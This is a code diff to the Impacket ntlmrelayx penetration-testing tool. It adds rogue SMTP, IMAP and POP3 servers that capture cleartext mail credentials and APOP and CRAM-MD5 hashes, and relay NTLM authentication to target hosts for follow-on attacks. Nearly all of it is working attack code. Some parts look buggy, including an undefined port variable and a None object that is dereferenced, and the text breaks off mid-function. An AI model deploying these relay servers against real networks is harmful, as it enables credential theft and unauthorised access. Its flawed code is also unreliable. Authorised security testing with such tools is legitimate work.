diff --git a/examples/ntlmrelayx.py b/examples/ntlmrelayx.py index a1371575e9..667ec2ff16 100644 --- a/examples/ntlmrelayx.py +++ b/examples/ntlmrelayx.py @@ -50,10 +50,16 @@ import json from time import sleep from threading import Thread +from pathlib import Path from impacket import version from impacket.examples import logger -from impacket.examples.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer, WCFRelayServer, RAWRelayServer, RPCRelayServer, WinRMRelayServer, WinRMSRelayServer, MSSQLRelayServer, RDPRelayServer +from impacket.examples.ntlmrelayx.servers import (SMBRelayServer, HTTPRelayServer, + WCFRelayServer, RAWRelayServer, + RPCRelayServer, WinRMRelayServer, + WinRMSRelayServer, MSSQLRelayServer, + RDPRelayServer, SMTPRelayServer, + IMAPRelayServer, POP3RelayServer) from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig, parse_listening_ports from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor, TargetsFileWatcher from impacket.examples.ntlmrelayx.servers.socksserver import SOCKS @@ -253,6 +259,21 @@ def start_servers(options, threads): c.setMSSQLDb(options.mssql_db) elif server is RDPRelayServer: c.setListeningPort(options.rdp_port) + elif server is SMTPRelayServer: + c.setListeningPort(options.smtp_port) + if options.smtp_server_cert and options.smtp_server_key: + c.set_smtp_server_cert(options.smtp_server_cert) + c.set_smtp_server_key(options.smtp_server_key) + elif server is IMAPRelayServer: + c.setListeningPort(options.imap_port) + if options.imap_server_cert and options.imap_server_key: + c.set_imap_server_cert(options.imap_server_cert) + c.set_imap_server_key(options.imap_server_key) + elif server is POP3RelayServer: + c.setListeningPort(options.pop3_port) + if options.pop3_server_cert and options.pop3_server_key: + c.set_pop3_server_cert(options.pop3_server_cert) + c.set_pop3_server_key(options.pop3_server_key) s = server(c) s.start() @@ -308,6 +329,9 @@ def stop_servers(threads): serversoptions.add_argument('--no-winrm-server', action='store_true', help='Disables the WinRM server') serversoptions.add_argument('--no-mssql-server', action='store_true', help='Disables the MSSQL server') serversoptions.add_argument('--no-rdp-server', action='store_true', help='Disables the RDP server') + serversoptions.add_argument('--no-smtp-server', action='store_true', help="Disables the SMTP server") + serversoptions.add_argument('--no-imap-server', action='store_true', help="Disables the IMAP server") + serversoptions.add_argument('--no-pop3-server', action='store_true', help="Disables the POP3 server") parser.add_argument('--smb-port', type=int, help='Port to listen on smb server', default=445) parser.add_argument('--http-port', help='Port(s) to listen on HTTP server. Can specify multiple ports by separating them with `,`, and ranges with `-`. Ex: `80,8000-8010`', default="80") @@ -316,6 +340,9 @@ def stop_servers(threads): parser.add_argument('--rpc-port', type=int, help='Port to listen on rpc server', default=135) parser.add_argument('--mssql-port', type=int, help='Port to listen on mssql server', default=1433) parser.add_argument('--rdp-port', type=int, help='Port to listen on rdp server', default=3389) + parser.add_argument('--smtp-port', type=int, help='Port to listen on smtp server', default=25) + parser.add_argument('--imap-port', type=int, help='Port to listen on imap server', default=143) + parser.add_argument('--pop3-port', type=int, help='Port to listen on pop3 server', default=110) parser.add_argument('--no-multirelay', action="store_true", required=False, help='If set, disable multi-host relay (SMB and HTTP servers)') parser.add_argument('--keep-relaying', action="store_true", required=False, help='If set, keeps relaying to a target even after a successful connection on it') @@ -443,6 +470,14 @@ def stop_servers(threads): sccmdpoptions.add_argument('--sccm-dp-extensions', action='store', required=False, help='A custom list of extensions to look for when downloading files from the SCCM Distribution Point. If not provided, defaults to .ps1,.bat,.xml,.txt,.pfx') sccmdpoptions.add_argument('--sccm-dp-files', action='store', required=False, help='The path to a file containing a list of specific URLs to download from the Distribution Point, instead of downloading by extensions. Providing this argument will skip file indexing') + # MAIL options + mailoptions = parser.add_argument_group("MAIL Servers options") + mailoptions.add_argument('--smtp-server-cert', required=False, type=Path, help="Path to SMTP Server certificate (in PEM format)") + mailoptions.add_argument('--smtp-server-key', required=False, type=Path, help="Path to SMTP Server private key (in PEM format)") + mailoptions.add_argument('--imap-server-cert', required=False, type=Path, help="Path to IMAP Server certificate (in PEM format)") + mailoptions.add_argument('--imap-server-key', required=False, type=Path, help="Path to IMAP Server private key (in PEM format)") + mailoptions.add_argument('--pop3-server-cert', required=False, type=Path, help="Path to POP3 Server certificate (in PEM format)") + mailoptions.add_argument('--pop3-server-key', required=False, type=Path, help="Path to POP3 Server private key (in PEM format)") try: options = parser.parse_args() except Exception as e: @@ -536,6 +571,16 @@ def stop_servers(threads): if not options.no_rdp_server: RELAY_SERVERS.append(RDPRelayServer) + + if not options.no_smtp_server: + RELAY_SERVERS.append(SMTPRelayServer) + + if not options.no_imap_server: + RELAY_SERVERS.append(IMAPRelayServer) + + if not options.no_pop3_server: + RELAY_SERVERS.append(POP3RelayServer) + if targetSystem is not None and options.w: watchthread = TargetsFileWatcher(targetSystem) diff --git a/impacket/examples/ntlmrelayx/clients/smbrelayclient.py b/impacket/examples/ntlmrelayx/clients/smbrelayclient.py index e61a3f19ac..9ff3f2c11f 100644 --- a/impacket/examples/ntlmrelayx/clients/smbrelayclient.py +++ b/impacket/examples/ntlmrelayx/clients/smbrelayclient.py @@ -431,6 +431,7 @@ def sendStandardSecurityAuth(self, sessionSetupData): flags2 = v1client.get_flags()[1] v1client.set_flags(flags2=flags2 & (~SMB.FLAGS2_EXTENDED_SECURITY)) if sessionSetupData['Account'] != '': + LOG.debug("(SMB) sessionnSetupData Account is not empty. Send them to server") smb = NewSMBPacket() smb['Flags1'] = 8 @@ -440,7 +441,7 @@ def sendStandardSecurityAuth(self, sessionSetupData): sessionSetup['Parameters']['MaxBuffer'] = 65535 sessionSetup['Parameters']['MaxMpxCount'] = 2 - sessionSetup['Parameters']['VCNumber'] = os.getpid() + sessionSetup['Parameters']['VCNumber'] = os.getpid() & 0xFFFF sessionSetup['Parameters']['SessionKey'] = v1client._dialects_parameters['SessionKey'] sessionSetup['Parameters']['AnsiPwdLength'] = len(sessionSetupData['AnsiPwd']) sessionSetup['Parameters']['UnicodePwdLength'] = len(sessionSetupData['UnicodePwd']) @@ -466,6 +467,7 @@ def sendStandardSecurityAuth(self, sessionSetupData): return smb, STATUS_SUCCESS else: # Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials + LOG.debug("(SMB1) Anonymous login, send STATUS_ACCESS_DENIED") clientResponse = None errorCode = STATUS_ACCESS_DENIED diff --git a/impacket/examples/ntlmrelayx/servers/__init__.py b/impacket/examples/ntlmrelayx/servers/__init__.py index 3159df4da8..3231defcc1 100644 --- a/impacket/examples/ntlmrelayx/servers/__init__.py +++ b/impacket/examples/ntlmrelayx/servers/__init__.py @@ -17,3 +17,6 @@ from impacket.examples.ntlmrelayx.servers.winrmsrelayserver import WinRMSRelayServer from impacket.examples.ntlmrelayx.servers.rdprelayserver import RDPRelayServer from impacket.examples.ntlmrelayx.servers.mssqlrelayserver import MSSQLRelayServer +from impacket.examples.ntlmrelayx.servers.smtprelayserver import SMTPRelayServer +from impacket.examples.ntlmrelayx.servers.imaprelayserver import IMAPRelayServer +from impacket.examples.ntlmrelayx.servers.pop3relayserver import POP3RelayServer \ No newline at end of file diff --git a/impacket/examples/ntlmrelayx/servers/imaprelayserver.py b/impacket/examples/ntlmrelayx/servers/imaprelayserver.py new file mode 100644 index 0000000000..b5a6a481fe --- /dev/null +++ b/impacket/examples/ntlmrelayx/servers/imaprelayserver.py @@ -0,0 +1,499 @@ +from threading import Thread +import socketserver + +from impacket import LOG, ntlm +from impacket.smbserver import outputToJohnFormat, writeJohnOutputToFile +from impacket.nt_errors import STATUS_ACCESS_DENIED, STATUS_SUCCESS +from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor +from impacket.examples.ntlmrelayx.servers.socksserver import activeConnections +from impacket.examples.utils import get_address +from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig +from impacket.examples.ntlmrelayx.utils.ssl import generate_self_signed_certificate, sni_callback +from OpenSSL import SSL, crypto +import socket +import re +import base64 +from typing import List + + +class IMAPServer(socketserver.ThreadingMixIn, socketserver.TCPServer): + def __init__(self, server_address, RequestHandlerClass, config: NTLMRelayxConfig): + self.config = config + self.self_signed_certificate = False + if self.config.imap_server_cert and self.config.imap_server_key: + try: + self.server_cert = crypto.load_certificate(crypto.FILETYPE_PEM, self.config.imap_server_cert) + self.server_key = crypto.load_privatekey(crypto.FILETYPE_PEM, self.config.imap_server_key) + except Exception as e: + LOG.error(f"(IMAP): Unable to load cert chain from files: {e}") + exit(1) + else: + LOG.warning("(IMAP) Generating self-signed certificate") + server_cert, server_key = generate_self_signed_certificate() + self.server_cert = crypto.load_certificate(crypto.FILETYPE_PEM, server_cert) + self.server_key = crypto.load_privatekey(crypto.FILETYPE_PEM, server_key) + self.self_signed_certificate = True + self.daemon_threads = True + self.address_family, self.server_address = get_address(server_address[0], server_address[1], self.config.ipv6) + socketserver.TCPServer.allow_reuse_address = True + socketserver.TCPServer.__init__(self, server_address, RequestHandlerClass) + +class IMAPHandler(socketserver.BaseRequestHandler): + def __init__(self,request: socket.socket, client_address, server): + self.server = server + self.challengeMessage = None + self.client = None + self.machineAccount = None + self.machineHashes = None + self.domainIp = None + self.authUser = None + self.tls_enabled = False + + if self.server.config.target is None: + # Reflection mode, defaults to SMB at the target, for now + self.server.config.target = TargetsProcessor(singleTarget='SMB://%s:445/' % client_address[0]) + self.target = self.server.config.target.getTarget() + if self.target is None: + LOG.info("(IMAP): Received connection from %s, but there are no more targets left!" % client_address[0]) + return + + LOG.info("(IMAP): Received connection from %s, attacking target %s://%s" % (client_address[0] ,self.target.scheme, self.target.netloc)) + super().__init__(request, client_address, server) + def upgrade_to_tls(self): + ''' Upgrading connection to TOS using certificate ''' + try: + # Create SSL context + context = SSL.Context(SSL.SSLv23_METHOD) + context.set_options(SSL.OP_NO_SSLv2 | SSL.OP_NO_SSLv3) + context.use_certificate(self.server.server_cert) + context.use_privatekey(self.server.server_key) + if self.self_signed_certificate: + context.sni_callback = sni_callback + connection = SSL.Connection(context, self.request) + connection.set_accept_state() + connection.do_handshake() + self.tls_enabled = True + + # Wrap socket + self.request = connection + + LOG.info(f"(IMAP): Successfully upgraded to TLS from {self.client_address[0]}") + return True + except Exception as e: + LOG.error(f"(IMAP): TLS upgrade failed: {e}") + return False + + def send_capability(self, tag="*"): + """Send CAPABILITY response with STARTTLS if not already in TLS""" + if self.tls_enabled: + # After STARTTLS, don't advertise it again + self.request.send(b"* CAPABILITY IMAP4 IMAP4rev1 AUTH=PLAIN AUTH=LOGIN AUTH=NTLM\r\n") + else: + # Before STARTTLS, advertise it + capability = "* CAPABILITY IMAP4 IMAP4rev1 AUTH=PLAIN AUTH=LOGIN AUTH=NTLM STARTTLS\r\n" + self.request.send(capability.encode('latin-1')) + + if tag != "*": + self.request.send(("%s OK CAPABILITY completed.\r\n" % tag).encode('latin-1')) + + def extract_tag(self, data): + """Extract IMAP command tag (e.g., 'A001' from 'A001 LOGIN ...')""" + try: + parts = data.decode('latin-1', errors='ignore').split() + if parts: + return parts[0] + except: + pass + return "A001" + + def handle_login(self, data): + """ + Handle LOGIN command + Format: TAG LOGIN username password + Credentials can be quoted or unquoted + """ + try: + RequestTag = self.extract_tag(data) + + # Decode the data + data_str = data.decode('latin-1', errors='ignore').strip() + + # Remove tag and LOGIN command + # Pattern: TAG LOGIN credentials + login_match = re.search(r'LOGIN\s+(.+)', data_str, re.IGNORECASE) + if not login_match: + response = "%s BAD LOGIN command syntax error\r\n" % RequestTag + self.request.send(response.encode('latin-1')) + return False + + credentials_part = login_match.group(1).strip() + + # Parse credentials - can be quoted or unquoted + username, password = self.parse_credentials(credentials_part) + + if username and password: + LOG.info(f"(IMAP): Captured AUTH LOGIN credentials from {self.client_address[0]}. {username} : {password}") + # Send success but then close + response = "%s BAD LOGIN credentials - I was used it (Impacket)\r\n" % RequestTag + self.request.send(response.encode('latin-1')) + return True + else: + # Invalid credentials format + response = "%s BAD LOGIN credentials format error\r\n" % RequestTag + self.request.send(response.encode('latin-1')) + return False + + except Exception as e: + return False + + def parse_credentials(self, creds_str): + """ + Parse username and password from LOGIN command + Supports: "user" "pass", user pass, {5}user {8}password (literal strings) + """ + try: + # Method 1: Quoted strings "user" "pass" + quoted_match = re.findall(r'"([^"]*)"', creds_str) + if len(quoted_match) >= 2: + return quoted_match[0], quoted_match[1] + + # Method 2: Space-separated (unquoted) + parts = creds_str.split() + if len(parts) >= 2: + # Remove any curly brace literals {5} + user = re.sub(r'^\{\d+\}', '', parts[0]) + passwd = re.sub(r'^\{\d+\}', '', parts[1]) + return user, passwd + return None, None + except: + return None, None + + def handle_authenticate_plain(self, data): + """Handle AUTHENTICATE PLAIN command - can be single-line or multi-line""" + try: + RequestTag = self.extract_tag(data) + data_str = data.decode('latin-1', errors='ignore').strip() + plain_match = re.search(r'AUTHENTICATE\s+PLAIN\s+(.+)', data_str, re.IGNORECASE) + + if plain_match: + b64_creds = plain_match.group(1).strip() + else: + response = "+\r\n" + self.request.send(response.encode('latin-1')) + cred_data = self.request.recv(1024) + if not cred_data: + return False + b64_creds = cred_data.decode('latin-1', errors='ignore').strip() + + try: + decoded = base64.b64decode(b64_creds).decode('latin-1', errors='ignore') + parts = decoded.split('\x00') + + if len(parts) >= 3: + username = parts[1] + password = parts[2] + elif len(parts) >= 2: + username = parts[0] + password = parts[1] + else: + raise ValueError("Invalid PLAIN format") + + if username and password: + LOG.info(f"IMAP): Captured AUTH PLAIN credentials from {self.client_address[0]}. {username} : {password}") + + response = "%s NO AUTHENTICATE captured by Impacket. Thank you!\r\n" % RequestTag + self.request.send(response.encode('latin-1')) + return True + + except Exception as e: + response = "%s NO AUTHENTICATE failed\r\n" % RequestTag + self.request.send(response.encode('latin-1')) + return False + + except Exception as e: + return False + + def handle_authenticate_login(self, data): + """Handle AUTHENTICATE LOGIN command - prompts for username, then password""" + try: + RequestTag = self.extract_tag(data) + + response = "+ " + base64.b64encode(b"Username:").decode('latin-1') + "\r\n" + self.request.send(response.encode('latin-1')) + + user_data = self.request.recv(1024) + if not user_data: + return False + + username_b64 = user_data.decode('latin-1', errors='ignore').strip() + username = base64.b64decode(username_b64).decode('latin-1', errors='ignore') + + response = "+ " + base64.b64encode(b"Password:").decode('latin-1') + "\r\n" + self.request.send(response.encode('latin-1')) + + pass_data = self.request.recv(1024) + if not pass_data: + return False + + password_b64 = pass_data.decode('latin-1', errors='ignore').strip() + password = base64.b64decode(password_b64).decode('latin-1', errors='ignore') + + if username and password: + LOG.info(f"(IMAP): Captured AUTH LOGIN credentials from {self.client_address[0]}. {username}: {password}") + response = "%s OK AUTHENTICATE completed\r\n" % RequestTag + self.request.send(response.encode('latin-1')) + return True + else: + response = "%s NO AUTHENTICATE failed\r\n" % RequestTag + self.request.send(response.encode('latin-1')) + return False + + except Exception as e: + return False + + def handle_authenticate_ntlm(self, data): + ''' Handle AUTHENTICATE NTLM command ''' + try: + RequestTag = self.extract_tag(data) + response = "+\r\n" + self.request.send(response.encode('latin-1')) + type1_data = self.request.recv(2048) + if not type1_data: + return False + negotiate_msg = base64.b64decode(type1_data.decode('latin-1', errors="ignore").strip()) + # Verify NTLMSSP signature + if negotiate_msg[0:8] != b'NTLMSSP\x00': + return False + + # Relay to gain challenge + challenge = self.do_ntlm_negotiate(negotiate_msg) + if challenge is None: + LOG.error(f"(IMAP) Error when relay NTLM Type 2 message to client ") + return False + + response = "+ %s\r\n" % base64.b64encode(challenge.getData()).decode('latin-1') + self.request.send(response.encode('latin-1')) + + authenticate_message = self.request.recv(4096) + if not authenticate_message: + return False + + auth_decoded = authenticate_message.decode('latin-1', errors='ignore').strip() + + if auth_decoded == '*' or auth_decoded == '': + LOG.error(f'(IMAP) Client cancelled NTLM authentication') + response = "%s NO AUTHENTICATE cancelled\r\n" % RequestTag + self.request.send(response.encode('latin-1')) + return False + + if not all(c in 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\r\n' for c in auth_decoded): + response = "%s NO AUTHENTICATE failed\r\n" % RequestTag + self.request.send(response.encode('latin-1')) + return False + + try: + auth_data = base64.b64decode(auth_decoded) + except Exception as e: + response = "%s NO AUTHENTICATE failed\r\n" % RequestTag + self.request.send(response.encode('latin-1')) + return False + + authenticateMessage = self.do_ntlm_auth(auth_data) + if authenticateMessage is None: + # Authentication failed + self.request.send(("%s NO AUTHENTICATE failed\r\n" % RequestTag).encode('latin-1')) + if authenticateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_UNICODE: + LOG.error("(IMAP): Authenticating against %s://%s as %s\\%s FAILED" % ( + self.target.scheme, self.target.netloc, + authenticateMessage['domain_name'].decode('utf-16le'), + authenticateMessage['user_name'].decode('utf-16le'))) + else: + LOG.error("(IMAP): Authenticating against %s://%s as %s\\%s FAILED" % ( + self.target.scheme, self.target.netloc, + authenticateMessage['domain_name'].decode('ascii'), + authenticateMessage['user_name'].decode('ascii'))) + return False + # relay worked, do whatever we want + self.request.send(("%s NO AUTHENTICATE relayed by Impacket\r\n" % RequestTag).encode('latin-1')) + self.client.setClientId() + if authenticateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_UNICODE: + LOG.info("(IMAP): Authenticating connection from %s/%s@%s against %s://%s SUCCEED [%s]" % ( + authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le'), + self.client_address[0], self.target.scheme, self.target.netloc, self.client.client_id)) + else: + LOG.info("(IMAP): Authenticating connection from %s/%s@%s against %s://%s SUCCEED [%s]" % ( + authenticateMessage['domain_name'].decode('ascii'), authenticateMessage['user_name'].decode('ascii'), + self.client_address[0], self.target.scheme, self.target.netloc, self.client.client_id)) + + ntlm_hash_data = outputToJohnFormat(self.challengeMessage['challenge'], authenticateMessage['user_name'], authenticateMessage['domain_name'], + authenticateMessage['lanman'], authenticateMessage['ntlm']) + self.client.sessionData['JOHN_OUTPUT'] = ntlm_hash_data + + if self.server.config.dumpHashes is True: + LOG.info("(IMAP): %s" % ntlm_hash_data['hash_string']) + + if self.server.config.outputFile is not None: + writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'], + self.server.config.outputFile) + + self.server.config.target.registerTarget(self.target, True, self.authUser) + + self.do_attack() + return True + except Exception as e: + LOG.error(f"Error when handle NTLM Auth: {e}") + return False + + def do_ntlm_negotiate(self, token: bytes) -> bytes | None: + self.client = self.server.config.protocolClients[self.target.scheme.upper()](self.server.config, self.target) + # If connection failed -> return False + if not self.client.initConnection(): + return None + self.challengeMessage = self.client.sendNegotiate(token) + if self.server.config.remove_target: + av_pairs = ntlm.AV_PAIRS(self.challengeMessage['TargetInfoFields']) + del av_pairs[ntlm.NTLMSSP_AV_HOSTNAME] + self.challengeMessage['TargetInfoFields'] = av_pairs.getData() + self.challengeMessage['TargetInfoFields_len'] = len(av_pairs.getData()) + self.challengeMessage['TargetInfoFields_max_len'] = len(av_pairs.getData()) + + if self.challengeMessage is False: + return None + return self.challengeMessage + + def do_ntlm_auth(self, token: bytes) -> bytes | None: + self.authenticateMessage = ntlm.NTLMAuthChallengeResponse() + self.authenticateMessage.fromString(token) + self.authUser = self.authenticateMessage.getUserString() + if self.authenticateMessage['user_name'] != '' or self.target.hostname == '127.0.0.1': + clientResponse, errorCode = self.client.sendAuth(token) + else: + # Anonymous login send STATUS_ACCESS_DENIED so we force the client to send his credentials, except when coming from localhost + errorCode = STATUS_ACCESS_DENIED + if errorCode == STATUS_SUCCESS: + return self.authenticateMessage + return None + + def do_attack(self): + # Check if SOCKS is enabled and if we support the target scheme + if self.server.config.runSocks and self.target.scheme.upper() in self.server.config.socksServer.supportedSchemes: + # Pass all the data to the socksplugins proxy + activeConnections.put((self.target.hostname, self.client.targetPort, self.target.scheme.upper(), + self.authUser, self.client, self.client.sessionData)) + return + + # If SOCKS is not enabled, or not supported for this scheme, fall back to "classic" attacks + if self.target.scheme.upper() in self.server.config.attacks: + # We have an attack.. go for it + clientThread = self.server.config.attacks[self.target.scheme.upper()](self.server.config, self.client.session, + self.authUser, self.target, self.client) + clientThread.start() + else: + LOG.error('(IMAP): No attack configured for %s' % self.target.scheme.upper()) + + def handle(self): + try: + # Send greeting + self.request.send("* OK Impacket IMAP4 Server Ready\r\n".encode('latin-1')) + + # Main loop to handle multiple commands + while True: + data = self.request.recv(1024) + if not data: + break + + # Handle CAPABILITY command + if b'CAPABILITY' in data.upper(): + RequestTag = self.extract_tag(data) + self.send_capability(RequestTag) + continue + + # Handle STARTTLS command + if b'STARTTLS' in data.upper(): + RequestTag = self.extract_tag(data) + + if self.tls_enabled: + # Already in TLS + response = "%s BAD STARTTLS already in TLS\r\n" % RequestTag + self.request.send(response.encode('latin-1')) + continue + + # Send OK response before upgrading + response = "%s OK Begin TLS negotiation now\r\n" % RequestTag + self.request.send(response.encode('latin-1')) + + # Upgrade to TLS + if not self.upgrade_to_tls(): + # TLS upgrade failed, close connection + break + + # Continue handling commands over TLS + continue + + # Handle LOGIN command + if b'LOGIN' in data.upper(): + if self.handle_login(data): + break + continue + + # Handle AUTHENTICATE PLAIN + if b'AUTHENTICATE PLAIN' in data.upper(): + if self.handle_authenticate_plain(data): + break + continue + + # Handle AUTHENTICATE LOGIN + if b'AUTHENTICATE LOGIN' in data.upper(): + if self.handle_authenticate_login(data): + break + continue + + # Handle AUTHENTICATE NTLM + if b'AUTHENTICATE NTLM' in data.upper(): + if self.handle_authenticate_ntlm(data): + break + continue + + # Handle LOGOUT + if b'LOGOUT' in data.upper(): + RequestTag = self.extract_tag(data) + response = "* BYE Impacket IMAP4 server logging out\r\n" + response += "%s OK LOGOUT completed\r\n" % RequestTag + self.request.send(response.encode('latin-1')) + break + + # Unknown command - send error + RequestTag = self.extract_tag(data) + response = "%s BAD Command not recognized\r\n" % RequestTag + self.request.send(response.encode('latin-1')) + + except Exception as e: + LOG.error(f"(IMAP): Error when handle command: {e.with_traceback()}") + pass + + +class IMAPRelayServer(Thread): + def __init__(self, config): + Thread.__init__(self) + self.daemon = True + self.config = config + self.server = None + + def run(self): + + if self.config.listeningPort: + imapport = self.config.listeningPort + else: + impaport = 143 + + LOG.info("Setting up IMAP Server on port " + str(imapport)) + + # changed to read from the interfaceIP set in the configuration + self.server = IMAPServer((self.config.interfaceIp, imapport), IMAPHandler, self.config) + + try: + self.server.serve_forever() + except KeyboardInterrupt: + pass + LOG.info('Shutting down IMAP Server') + self.server.server_close() \ No newline at end of file diff --git a/impacket/examples/ntlmrelayx/servers/pop3relayserver.py b/impacket/examples/ntlmrelayx/servers/pop3relayserver.py new file mode 100644 index 0000000000..02a8fde538 --- /dev/null +++ b/impacket/examples/ntlmrelayx/servers/pop3relayserver.py @@ -0,0 +1,502 @@ +from threading import Thread +import socketserver + +from impacket import LOG, ntlm +from impacket.smbserver import outputToJohnFormat, writeJohnOutputToFile +from impacket.nt_errors import STATUS_ACCESS_DENIED, STATUS_SUCCESS +from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor +from impacket.examples.ntlmrelayx.servers.socksserver import activeConnections +from impacket.examples.utils import get_address +from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig +from impacket.examples.ntlmrelayx.utils.ssl import generate_self_signed_certificate, sni_callback +from OpenSSL import SSL, crypto +import socket +import re +import os +import traceback +import base64 + + +class POP3Server(socketserver.ThreadingMixIn, socketserver.TCPServer): + def __init__(self, server_address, RequestHandlerClass, config: NTLMRelayxConfig): + self.config = config + if self.config.pop3_server_cert and self.config.pop3_server_key: + try: + self.server_cert = crypto.load_certificate(crypto.FILETYPE_PEM, self.config.pop3_server_cert) + self.server_key = crypto.load_privatekey(crypto.FILETYPE_PEM, self.config.pop3_server_key) + except Exception as e: + LOG.error(f"(POP3): Unable to load cert chain from files: {e}") + exit(1) + else: + LOG.warning("(POP3) Generating self-signed certificate") + server_cert, server_key = generate_self_signed_certificate() + self.server_cert = crypto.load_certificate(crypto.FILETYPE_PEM, server_cert) + self.server_key = crypto.load_privatekey(crypto.FILETYPE_PEM, server_key) + + self.daemon_threads = True + self.address_family, self.server_address = get_address(server_address[0], server_address[1], self.config.ipv6) + socketserver.TCPServer.allow_reuse_address = True + socketserver.TCPServer.__init__(self, server_address, RequestHandlerClass) + +class POP3Handler(socketserver.BaseRequestHandler): + def __init__(self,request: socket.socket, client_address, server): + self.server = server + self.challengeMessage = None + self.client = None + self.machineAccount = None + self.machineHashes = None + self.domainIp = None + self.authUser = None + self.tls_enabled = False + + if self.server.config.target is None: + # Reflection mode, defaults to SMB at the target, for now + self.server.config.target = TargetsProcessor(singleTarget='SMB://%s:445/' % client_address[0]) + self.target = self.server.config.target.getTarget() + if self.target is None: + LOG.info("(POP3): Received connection from %s, but there are no more targets left!" % client_address[0]) + return + + LOG.info("(POP3): Received connection from %s, attacking target %s://%s" % (client_address[0] ,self.target.scheme, self.target.netloc)) + super().__init__(request, client_address, server) + + def upgrade_to_tls(self): + ''' Upgrading connection to TOS using certificate ''' + try: + # Create SSL context + context = SSL.Context(SSL.SSLv23_METHOD) + context.set_options(SSL.OP_NO_SSLv2 | SSL.OP_NO_SSLv3) + context.use_certificate(self.server.server_cert) + context.use_privatekey(self.server.server_key) + context.sni_callback = sni_callback + connection = SSL.Connection(context, self.request) + connection.set_accept_state() + connection.do_handshake() + self.tls_enabled = True + + # Wrap socket + self.request = connection + + LOG.info(f"(POP3): Successfully upgraded to TLS from {self.client_address[0]}") + return True + except Exception as e: + LOG.error(f"(POP3): TLS upgrade failed: {e}") + return False + + def generate_challenge(self): + """Generate challenge for APOP and CRAM-MD5""" + import time + import random + timestamp = int(time.time()) + random_data = random.randint(1000, 9999) + # APOP format: + self.challenge = "<%d.%d@%s>" % (random_data, timestamp, "IMPACKETMACHINE") + return self.challenge + + def send_packet(self, packet): + """Send a packet to client""" + self.request.send(packet.encode('latin-1')) + + def send_ok(self, message=""): + """Send +OK response""" + if message: + response = "+OK %s\r\n" % message + else: + response = "+OK\r\n" + self.request.send(response.encode('latin-1')) + + def send_err(self, message=""): + """Send -ERR response""" + if message: + response = "-ERR %s\r\n" % message + else: + response = "-ERR\r\n" + self.request.send(response.encode('latin-1')) + + def send_continue(self, data=""): + """Send continuation (+) response for multi-line auth""" + if data: + response = "+ %s\r\n" % data + else: + response = "+\r\n" + self.request.send(response.encode('latin-1')) + + def handle_apop(self, data): + """Handle APOP authentication (MD5 challenge-response)""" + # APOP username digest + # digest is MD5(challenge + password) + try: + parts = data.strip().split(b' ', 2) + if len(parts) < 3: + return False + + username = parts[1].decode('latin-1') + digest = parts[2].decode('latin-1').lower() + + # Format for hashcat/john: username:$apop$challenge$digest + hash_string = "%s:$apop$%s$%s" % (username, self.challenge, digest) + + LOG.info(f"(POP3) Captured AUTH APOP authentication from {self.client_address[0]}. User: {username}, hash: {hash_string}") + return True + except Exception as e: + LOG.error(f"(POP3) Error parsing APOP: {e}") + return False + + def handle_auth_plain(self, data): + """Handle AUTH PLAIN (base64 encoded username/password)""" + try: + # AUTH PLAIN can be sent as: + # AUTH PLAIN + # or + # AUTH PLAIN + # + + if len(data.strip().split(b' ')) > 2: + # Inline format + auth_data = data.strip().split(b' ', 2)[2] + else: + # Need to read next line + self.send_continue() + auth_data = self.request.recv(1024).strip() + + # Decode base64 + decoded = base64.b64decode(auth_data) + # Format: [authzid]\x00username\x00password + parts = decoded.split(b'\x00') + + if len(parts) >= 3: + username = parts[1].decode('latin-1', errors='ignore') + password = parts[2].decode('latin-1', errors='ignore') + elif len(parts) == 2: + username = parts[0].decode('latin-1', errors='ignore') + password = parts[1].decode('latin-1', errors='ignore') + else: + return False + + LOG.info(f"(POP3) Captured AUTL PLAIN authentication from {self.client_address[0]}. {username} : {password}") + return True + except Exception as e: + LOG.error(f"(POP3) Error when parsing AUTH PLAIN: {e}") + return False + + def handle_auth_login(self, data): + """Handle AUTH LOGIN (two-stage base64 authentication)""" + try: + # AUTH LOGIN is two-stage: + # Client: AUTH LOGIN + # Server: + VXNlcm5hbWU6 (base64 "Username:") + # Client: + # Server: + UGFzc3dvcmQ6 (base64 "Password:") + # Client: + + # Send "Username:" prompt + self.send_continue(base64.b64encode(b"Username:").decode('latin-1')) + username_b64 = self.request.recv(1024).strip() + + if not username_b64: + return False + + username = base64.b64decode(username_b64).decode('latin-1', errors='ignore') + + # Send "Password:" prompt + self.send_continue(base64.b64encode(b"Password:").decode('latin-1')) + password_b64 = self.request.recv(1024).strip() + + if not password_b64: + return False + + password = base64.b64decode(password_b64).decode('latin-1', errors='ignore') + + LOG.info(f"(POP3) Captured AUTH LOGIN authentication from {self.client_address[0]}. {username} : {password}") + return True + except Exception as e: + LOG.error(f"(POP3) Error when parsing AUTH LOGIN authentication: {e}") + return False + + def handle_auth_cram_md5(self, data): + """Handle AUTH CRAM-MD5 (challenge-response)""" + try: + # Generate challenge + import time + challenge = self.generate_challenge() + challenge_b64 = base64.b64encode(challenge.encode('latin-1')).decode('latin-1') + + # Send challenge + self.send_continue(challenge_b64) + + # Receive response + response_b64 = self.request.recv(1024).strip() + if not response_b64: + return False + + response = base64.b64decode(response_b64).decode('latin-1', errors='ignore') + # Response format: usernamedigest + parts = response.split(' ', 1) + + if len(parts) < 2: + return False + + username = parts[0] + digest = parts[1].lower() + + # Format for hashcat: $cram_md5$challenge$digest$username + hash_string = "%s:$cram_md5$%s$%s" % (username, challenge, digest) + + LOG.info(f"(POP3) Captured AUTH CRAM-MD5 authentication from {self.client_address[0]}. {username} : {hash_string}") + return True + except Exception as e: + LOG.error(f"(POP3) Error parsing CRAM-MD5: {e}") + return False + + def handle_auth_ntlm(self, data): + ''' Handle AUTHENTICATE NTLM command ''' + try: + response = "+\r\n" + self.request.send(response.encode('latin-1')) + type1_data = self.request.recv(2048) + if not type1_data: + return False + negotiate_msg = 